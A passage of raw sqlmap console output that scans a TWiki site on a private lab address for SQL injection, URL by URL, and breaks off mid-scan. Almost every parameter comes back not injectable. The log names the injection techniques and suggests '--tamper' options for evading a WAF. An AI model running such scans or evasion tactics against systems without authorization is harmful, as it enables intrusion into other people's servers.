[18:43:22] [INFO] testing 'MySQL inline queries' | |
[18:43:22] [INFO] testing 'PostgreSQL inline queries' | |
[18:43:22] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:43:22] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:43:23] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:43:23] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:43:24] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:43:24] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:43:25] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:43:25] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:43:26] [INFO] testing 'Oracle AND time-based blind' | |
[18:43:26] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:43:34] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:43:41] [WARNING] GET parameter 'param1' is not injectable | |
[18:43:41] [INFO] testing if GET parameter 'param2' is dynamic | |
[18:43:42] [WARNING] GET parameter 'param2' does not appear dynamic | |
[18:43:42] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable | |
[18:43:42] [INFO] testing for SQL injection on GET parameter 'param2' | |
[18:43:42] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:43:43] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:43:43] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:43:44] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:43:44] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:43:45] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:43:46] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:43:46] [INFO] testing 'MySQL inline queries' | |
[18:43:46] [INFO] testing 'PostgreSQL inline queries' | |
[18:43:46] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:43:46] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:43:47] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:43:47] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:43:48] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:43:48] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:43:49] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:43:49] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:43:50] [INFO] testing 'Oracle AND time-based blind' | |
[18:43:50] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:43:58] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:44:06] [WARNING] GET parameter 'param2' is not injectable | |
[18:44:06] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 45: | |
GET http://192.168.1.113/twiki/bin/search/Know/?search=\.*&scope=topic&order=modified&reverse=on®ex=on&nosearch=on&limit=100 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:44:06] [INFO] testing URL 'http://192.168.1.113/twiki/bin/search/Know/?search=\.*&scope=topic&order=modified&reverse=on®ex=on&nosearch=on&limit=100' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[18:44:06] [INFO] testing connection to the target URL | |
[18:44:06] [INFO] testing if the target URL is stable | |
[18:44:07] [INFO] target URL is stable | |
[18:44:07] [INFO] testing if URI parameter '#1*' is dynamic | |
[18:44:07] [INFO] confirming that URI parameter '#1*' is dynamic | |
[18:44:07] [INFO] URI parameter '#1*' is dynamic | |
[18:44:07] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[18:44:07] [INFO] testing for SQL injection on URI parameter '#1*' | |
[18:44:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:44:08] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:44:08] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:44:09] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:44:09] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:44:10] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:44:10] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:44:10] [INFO] testing 'MySQL inline queries' | |
[18:44:10] [INFO] testing 'PostgreSQL inline queries' | |
[18:44:11] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:44:11] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:44:11] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:44:11] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:44:12] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:44:12] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:44:13] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:44:13] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:44:14] [INFO] testing 'Oracle AND time-based blind' | |
[18:44:14] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:44:14] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:44:20] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:44:25] [WARNING] URI parameter '#1*' is not injectable | |
[18:44:25] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 46: | |
GET http://192.168.1.113/twiki/bin/search/Know/?search=\.*&scope=topic&order=modified&reverse=on®ex=on&nosearch=on&limit=200 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:44:25] [INFO] testing URL 'http://192.168.1.113/twiki/bin/search/Know/?search=\.*&scope=topic&order=modified&reverse=on®ex=on&nosearch=on&limit=200' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[18:44:25] [INFO] testing connection to the target URL | |
[18:44:26] [INFO] testing if the target URL is stable | |
[18:44:27] [INFO] target URL is stable | |
[18:44:27] [INFO] testing if URI parameter '#1*' is dynamic | |
[18:44:27] [INFO] confirming that URI parameter '#1*' is dynamic | |
[18:44:27] [INFO] URI parameter '#1*' is dynamic | |
[18:44:27] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[18:44:27] [INFO] testing for SQL injection on URI parameter '#1*' | |
[18:44:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:44:28] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:44:28] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:44:29] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:44:29] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:44:30] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:44:30] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:44:30] [INFO] testing 'MySQL inline queries' | |
[18:44:30] [INFO] testing 'PostgreSQL inline queries' | |
[18:44:31] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:44:31] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:44:31] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:44:32] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:44:32] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:44:33] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:44:33] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:44:34] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:44:35] [INFO] testing 'Oracle AND time-based blind' | |
[18:44:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:44:35] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:44:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:44:48] [WARNING] URI parameter '#1*' is not injectable | |
[18:44:48] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 47: | |
GET http://192.168.1.113/twiki/bin/search/Know/?search=\.*&scope=topic&order=modified&reverse=on®ex=on&nosearch=on&limit=400 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:44:48] [INFO] testing URL 'http://192.168.1.113/twiki/bin/search/Know/?search=\.*&scope=topic&order=modified&reverse=on®ex=on&nosearch=on&limit=400' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[18:44:48] [INFO] testing connection to the target URL | |
[18:44:48] [INFO] testing if the target URL is stable | |
[18:44:49] [INFO] target URL is stable | |
[18:44:49] [INFO] testing if URI parameter '#1*' is dynamic | |
[18:44:49] [INFO] confirming that URI parameter '#1*' is dynamic | |
[18:44:49] [INFO] URI parameter '#1*' is dynamic | |
[18:44:49] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[18:44:49] [INFO] testing for SQL injection on URI parameter '#1*' | |
[18:44:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:44:50] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:44:50] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:44:51] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:44:51] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:44:52] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:44:52] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:44:52] [INFO] testing 'MySQL inline queries' | |
[18:44:52] [INFO] testing 'PostgreSQL inline queries' | |
[18:44:52] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:44:53] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:44:53] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:44:53] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:44:54] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:44:54] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:44:55] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:44:55] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:44:55] [INFO] testing 'Oracle AND time-based blind' | |
[18:44:56] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:44:56] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:45:01] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:45:07] [WARNING] URI parameter '#1*' is not injectable | |
[18:45:07] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 48: | |
GET http://192.168.1.113/twiki/bin/search/Know/?search=\.*&scope=topic&order=modified&reverse=on®ex=on&nosearch=on&limit=800 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:45:07] [INFO] testing URL 'http://192.168.1.113/twiki/bin/search/Know/?search=\.*&scope=topic&order=modified&reverse=on®ex=on&nosearch=on&limit=800' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[18:45:07] [INFO] testing connection to the target URL | |
[18:45:07] [INFO] testing if the target URL is stable | |
[18:45:08] [INFO] target URL is stable | |
[18:45:08] [INFO] testing if URI parameter '#1*' is dynamic | |
[18:45:08] [INFO] confirming that URI parameter '#1*' is dynamic | |
[18:45:08] [INFO] URI parameter '#1*' is dynamic | |
[18:45:08] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[18:45:08] [INFO] testing for SQL injection on URI parameter '#1*' | |
[18:45:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:45:09] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:45:09] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:45:10] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:45:10] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:45:11] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:45:11] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:45:11] [INFO] testing 'MySQL inline queries' | |
[18:45:12] [INFO] testing 'PostgreSQL inline queries' | |
[18:45:12] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:45:12] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:45:12] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:45:13] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:45:13] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:45:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:45:14] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:45:14] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:45:15] [INFO] testing 'Oracle AND time-based blind' | |
[18:45:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:45:15] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:45:21] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:45:26] [WARNING] URI parameter '#1*' is not injectable | |
[18:45:26] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 49: | |
GET http://192.168.1.113/twiki/bin/search/Know/SearchResult?search=\.*&scope=topic&order=modified&reverse=on®ex=on&nosearch=on | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:45:26] [INFO] testing URL 'http://192.168.1.113/twiki/bin/search/Know/SearchResult?search=\.*&scope=topic&order=modified&reverse=on®ex=on&nosearch=on' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[18:45:26] [INFO] testing connection to the target URL | |
[18:45:27] [INFO] testing if the target URL is stable | |
[18:45:27] [INFO] target URL is stable | |
[18:45:27] [INFO] testing if URI parameter '#1*' is dynamic | |
[18:45:27] [INFO] confirming that URI parameter '#1*' is dynamic | |
[18:45:28] [INFO] URI parameter '#1*' is dynamic | |
[18:45:28] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[18:45:28] [INFO] testing for SQL injection on URI parameter '#1*' | |
[18:45:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:45:29] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:45:29] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:45:29] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:45:30] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:45:30] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:45:31] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:45:31] [INFO] testing 'MySQL inline queries' | |
[18:45:31] [INFO] testing 'PostgreSQL inline queries' | |
[18:45:31] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:45:31] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:45:32] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:45:32] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:45:32] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:45:33] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:45:33] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:45:34] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:45:34] [INFO] testing 'Oracle AND time-based blind' | |
[18:45:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:45:35] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:45:40] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:45:46] [WARNING] URI parameter '#1*' is not injectable | |
[18:45:46] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 50: | |
GET http://192.168.1.113:80/twiki/bin/edit/Know/WebChanges?t=1441456711 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:45:46] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/Know/WebChanges?t=1441456711' | |
[18:45:46] [INFO] testing connection to the target URL | |
[18:45:46] [INFO] testing if the target URL is stable | |
[18:45:47] [INFO] target URL is stable | |
[18:45:47] [INFO] testing if GET parameter 't' is dynamic | |
[18:45:47] [WARNING] GET parameter 't' does not appear dynamic | |
[18:45:47] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable | |
[18:45:47] [INFO] testing for SQL injection on GET parameter 't' | |
[18:45:47] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:45:48] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:45:48] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:45:49] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:45:49] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:45:50] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:45:50] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:45:50] [INFO] testing 'MySQL inline queries' | |
[18:45:50] [INFO] testing 'PostgreSQL inline queries' | |
[18:45:50] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:45:50] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:45:51] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:45:51] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:45:51] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:45:52] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:45:52] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:45:53] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:45:53] [INFO] testing 'Oracle AND time-based blind' | |
[18:45:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:45:54] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:45:59] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:46:05] [WARNING] GET parameter 't' is not injectable | |
[18:46:05] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 51: | |
GET http://192.168.1.113:80/twiki/bin/search/Know/SearchResult?scope=text®ex=on&search=Web *Changes[^A-Za-z] | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:46:05] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/Know/SearchResult?scope=text®ex=on&search=Web *Changes[^A-Za-z]' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[18:46:05] [INFO] testing connection to the target URL | |
[18:46:05] [INFO] testing if the target URL is stable | |
[18:46:06] [INFO] target URL is stable | |
[18:46:06] [INFO] testing if URI parameter '#1*' is dynamic | |
[18:46:06] [WARNING] URI parameter '#1*' does not appear dynamic | |
[18:46:06] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[18:46:06] [INFO] testing for SQL injection on URI parameter '#1*' | |
[18:46:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:46:07] [WARNING] reflective value(s) found and filtering out | |
[18:46:08] [INFO] URI parameter '#1*' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable | |
[18:46:08] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:46:08] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:46:08] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:46:08] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:46:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:46:08] [INFO] testing 'MySQL inline queries' | |
[18:46:08] [INFO] testing 'PostgreSQL inline queries' | |
[18:46:08] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:46:08] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:46:08] [WARNING] time-based comparison requires larger statistical model, please wait...... | |
[18:46:09] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:46:09] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:46:09] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:46:09] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:46:09] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:46:09] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:46:09] [INFO] testing 'Oracle AND time-based blind' | |
[18:46:09] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' | |
[18:46:09] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:46:09] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found | |
[18:46:11] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns' | |
[18:46:13] [INFO] checking if the injection point on URI parameter '#1*' is a false positive | |
[18:46:13] [WARNING] false positive or unexploitable injection point detected | |
[18:46:13] [WARNING] URI parameter '#1*' is not injectable | |
[18:46:13] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 52: | |
GET http://192.168.1.113:80/twiki/bin/view/Know/WebChanges?skin=print | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:46:13] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/Know/WebChanges?skin=print' | |
[18:46:13] [INFO] testing connection to the target URL | |
[18:46:14] [INFO] testing if the target URL is stable | |
[18:46:14] [INFO] target URL is stable | |
[18:46:14] [INFO] testing if GET parameter 'skin' is dynamic | |
[18:46:15] [INFO] confirming that GET parameter 'skin' is dynamic | |
[18:46:15] [INFO] GET parameter 'skin' is dynamic | |
[18:46:15] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable | |
[18:46:15] [INFO] testing for SQL injection on GET parameter 'skin' | |
[18:46:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:46:15] [INFO] heuristics detected web page charset 'ascii' | |
[18:46:15] [WARNING] reflective value(s) found and filtering out | |
[18:46:17] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:46:17] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:46:18] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:46:19] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:46:19] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:46:20] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:46:20] [INFO] testing 'MySQL inline queries' | |
[18:46:20] [INFO] testing 'PostgreSQL inline queries' | |
[18:46:21] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:46:21] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:46:21] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:46:22] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:46:22] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:46:23] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:46:24] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:46:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:46:25] [INFO] testing 'Oracle AND time-based blind' | |
[18:46:26] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:46:26] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:46:34] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:46:43] [WARNING] GET parameter 'skin' is not injectable | |
[18:46:43] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 53: | |
GET http://192.168.1.113:80/twiki/bin/rdiff/Know/WebChanges?rev1=1.3&rev2=1.2 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:46:43] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/Know/WebChanges?rev1=1.3&rev2=1.2' | |
[18:46:43] [INFO] testing connection to the target URL | |
[18:46:43] [INFO] testing if the target URL is stable | |
[18:46:44] [INFO] target URL is stable | |
[18:46:44] [INFO] testing if GET parameter 'rev1' is dynamic | |
[18:46:44] [WARNING] GET parameter 'rev1' does not appear dynamic | |
[18:46:45] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable | |
[18:46:45] [INFO] testing for SQL injection on GET parameter 'rev1' | |
[18:46:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:46:47] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:46:47] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:46:48] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:46:49] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
